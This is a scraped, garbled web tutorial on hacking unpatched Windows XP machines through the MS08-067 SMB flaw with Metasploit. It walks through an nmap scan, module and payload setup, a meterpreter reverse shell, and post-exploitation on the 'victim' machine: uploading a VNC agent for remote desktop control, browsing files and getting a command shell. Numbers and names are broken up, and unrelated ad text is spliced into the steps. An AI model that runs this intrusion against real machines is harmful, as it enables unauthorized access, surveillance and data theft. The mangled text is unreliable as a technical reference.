Hack windows xp with metasploit. Hack windows xp with MS0. Using metasploit its possible to hack windows xp machines just by using the ip address of the victim machine. It does not involve installing any backdoor or trojan server on the victim machine. Metasploit does this by exploiting a vulnerability in windows samba service called ms. This exploit works on windows xp upto version xp sp. The vulnerability/exploit module inside metasploit is Name: Microsoft Server Service Relative Path Stack Corruption. Module: exploit/windows/smb/ms. Further details and references to the vulnerability can be found at the following pageshttp: //cvedetails. MS0. 8- 0. 67. mspxhttp: //www. Note : This exploit is old as of now and will work only if the windows xp on the target machine is unpatched and not running any firewalls. If you were to scan a range of ip addresses to discover online windows xp machines, then most of them would likely be patched ( through automatic updates ). So if you want to test and practise this exploit, setup a vulnerable unpatched xp system. Scan for open ports. Before exploiting the xp machine with metasploit it is a good idea to scan for open ports using nmap to confirm that ports are accessible and accepting connections. Here is a quick example[email protected]: ~# nmap - n - s. V 1. 92. 1. 68. 1. Starting Nmap 6. 2. PDT. Nmap scan report for 1. Host is up (0. 0. Not shown: 9. 96 closed ports. PORT STATE SERVICE VERSION. Microsoft Windows RPC. Microsoft Windows XP microsoft- ds. Microsoft HTTPAPI httpd 1. SSDP/UPn. P). MAC Address: 0. D3: 2. C: 3. 7 (Cadmus Computer Systems). Service Info: OS: Windows; CPE: cpe: /o: microsoft: windows. Service detection performed. ![]() Please report any incorrect results at http: //nmap. Nmap done: 1 IP address (1 host up) scanned in 7. Check the port number 4. It is running the microsoft- ds samba service. This service is used to share printers and files across the network. It is this service that is vulnerable to the above mentioned exploit and would be hacked next using metasploit. Exploit using metasploit. The exploit is quite easy to launch. Start msfconsole. Using notepad to track pentests? Have Metasploit Pro report on hosts. Select the exploit with 'use' command. If you want to read information about the exploit then type 'info' and hit enter. See the options availablemsf exploit(ms. Module options (exploit/windows/smb/ms. Name Current Setting Required Description. I'm going to do my best (no guarantees) to update this page with a listing of each new WS2012 Hyper-V (and related) feature as it is revealed by Microsoft (and. A community-built site of hints and tips on using Apple's new Mac OS X operating system. RHOST yes The target address. RPORT 4. 45 yes Set the SMB service port. 1-888-NETGEAR (638-4327) Email: [email protected] ProSafeĀ® 16- and 24-port Gigabit Smart Switches Data Sheet GS716T-200, GS724T-300 Designed for SMB Customers with. SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC). Exploit target. 0 Automatic Targeting. The important option to set is the RHOST (Remote Host). This is the ip address of the victim machine that is running the vulnerable windows xp. In this example the ip address is 1. So set the optionmsf exploit(ms. RHOST 1. 92. 1. 68. RHOST => 1. 92. Select the payload. Next comes the payload. Payload is that piece of code that runs along with the exploit and provides the hacker with a reverse shell. We are going to use the windows meterpreter payload. If you want to see all the available payloads then use the 'show payloads' command. Why meterpreter ? Because meterpreter is a very powerful kind of reverse shell that has lots of functionality already built in. The functionality includes common post exploitation tasks like scanning the target's network, hardware, accessing devices etc. Meterpreter can also start a vnc session. Check options once again. Now that we have selected out payload, its time to check the options once again. Module options (exploit/windows/smb/ms. Name Current Setting Required Description. RHOST 1. 92. 1. 68. The target address. RPORT 4. 45 yes Set the SMB service port. SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC). Payload options (windows/meterpreter/reverse_tcp). Name Current Setting Required Description. EXITFUNC thread yes Exit technique: seh, thread, process, none. LHOST yes The listen address. LPORT 4. 44. 4 yes The listen port. Exploit target. 0 Automatic Targeting. Now the options also include the payload options. The important options to set are LHOST and LPORT. The LHOST is the ip address of local machine or hacker machine. The LPORT is the port number on which the reverse shell listener will receive the incoming shell. So setup the correct valuesmsf exploit(ms. LHOST 1. 92. 1. 68. LHOST => 1. 92. LPORT 6. 66. 6. LPORT => 6. Launch the exploit. Now metasploit is all configured to launch the exploit. Enter 'exploit' and hit enter. Started reverse handler on 1. Automatically detecting the target.. Fingerprint: Windows XP - Service Pack 3 - lang: English. Selected Target: Windows XP SP3 English (Always. On NX). [*] Attempting to trigger the vulnerability.. Sending stage (7. Meterpreter session 2 opened (1. If it runs correctly you finally get the meterpreter shell. Type in help and hit enter to see what commands are available. Lets try running some of the common commands. Post Exploitation with meterpreter. Get system information. The 'sysinfo' command will get the system information of victim machine. Computer : - -- -- -- -- -. OS : Windows XP (Build 2. Service Pack 3). Architecture : x. System Language : en_US. Meterpreter : x. Shows some basic information about the windows installation. Get network information. The 'ipconfig' command will show the network interfaces and their network configuration. Name : MS TCP Loopback interface. Hardware MAC : 0. MTU : 1. 52. 0. IPv. 4 Address : 1. IPv. 4 Netmask : 2. Name : AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport. Hardware MAC : 0. MTU : 1. 50. 0. IPv. 4 Address : 1. IPv. 4 Netmask : 2. Start vnc server. If you want a vnc session on the victim machine then run the vnc script. Creating a VNC reverse tcp stager: LHOST=1. LPORT=4. 54. 5). [*] Running payload handler. VNC stager executable 7. Uploaded the VNC agent to C: \WINDOWS\TEMP\r. Rlm. Dx. exe (must be deleted manually). Executing the VNC agent with endpoint 1. It takes a few seconds, and then a window will popup with remote desktop on the vicitim machine. Now you can use your mouse to interact with the victim desktop as if it were your own. Browsing the file system. For browsing the file system there are lots of linux style commands. Command Description. Read the contents of a file to the screen. Change directory. Download a file or directory. Edit a file. getlwd Print local working directory. Print working directory. Change local working directory. Print local working directory. List files. mkdir Make directory. Print working directory. Delete the specified file. Remove directory. Search for files. Upload a file or directory. Get native shell. If you finally want the command prompt style shell on the victim machine enter 'shell' and hit enter. Process 1. 32. 8 created. Channel 3 created. Microsoft Windows XP [Version 5. C) Copyright 1. 98. Microsoft Corp. C: \WINDOWS\system. Now its the windows command prompt. Play around it and when done, type 'exit' and press enter. It will come back to the meterpreter session. Next. The meterpreter commands shown above were just the basic commands of meterpreter. Meterpreter has lots of inbuilt scripts that can do lots of other things on the victim machine. We shall check them out in some other post. So keep hacking till then. Last Updated On : 8th May 2. Partner Perspectives. Partner Perspectives. Partner Perspectives. White Papers. Current Issue. Digital Transformation Myths & Truths. Transformation is on every IT organization's to- do list, but effectively transforming IT means a major shift in technology as well as business models and culture. In this IT Trend Report, we examine some of the misconceptions of digital transformation and look at steps you can take to succeed technically and culturally.[Interop ITX 2. State Of Dev. Ops Report. The Dev. Ops movement brings application development and infrastructure operations together to increase efficiency and deploy applications more quickly. But embracing Dev. Ops means making significant cultural, organizational, and technological changes. This research report will examine how and why IT organizations are adopting Dev. Ops methodologies, the effects on their staff and processes, and the tools they are utilizing for the best results. Video. Sponsored Video. Slideshows. Twitter Feed.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. Archives
September 2018
Categories |